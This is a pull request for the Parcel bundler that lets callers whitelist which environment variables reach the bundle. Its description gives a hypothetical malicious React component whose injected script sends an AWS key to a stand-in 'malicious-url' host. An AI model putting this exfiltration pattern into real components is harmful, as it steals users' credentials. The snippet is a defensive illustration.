### PR TITLE
Programatically pass env vars as a whitelist

### DIFF
--- a/src/Bundler.js
+++ b/src/Bundler.js
@@ -318,11 +318,14 @@ class Bundler extends EventEmitter {
     }
 
     await this.loadPlugins();
-    await loadEnv(Path.join(this.options.rootDir, 'index'));
+    
+    if (!this.options.env) {
+      await loadEnv(Path.join(this.options.rootDir, 'index'));
+      this.options.env = process.env;
+    }
 
     this.options.extensions = Object.assign({}, this.parser.extensions);
     this.options.bundleLoaders = this.bundleLoaders;
-    this.options.env = process.env;
 
     if (this.options.watch) {
       this.watcher = new Watcher();


### PR DESCRIPTION
Whitelisting is important to avoid accidentally leaking potentially sensitive information to the bundle. Imagine a React component published to npm that looked like:

```javascript
export default () => {
  <script dangerouslySetInnerHTML={{__html: `
    var img = new Image();
    img.src = 'https://malicious-url/?aws-key=${process.env.AWS_KEY}';
  ` }} />
}
```

Now, when programatically bundling, it possible to avoid this issue:

```javascript
const Bundler = require('parcel-bundler');

new Bundler(entry, {
  env: {
    foo: 'bar',
    // YAY - no AWS secret leaked!
  }
});
```

To retain the old behaviour while mixing in new variables could be achieved with:

```javascript
const Bundler = require('parcel-bundler');

new Bundler(entry, {
  env: {
    ...process.env,
    foo: 'bar',
    // YAY - no AWS secret leaked!
  }
});
```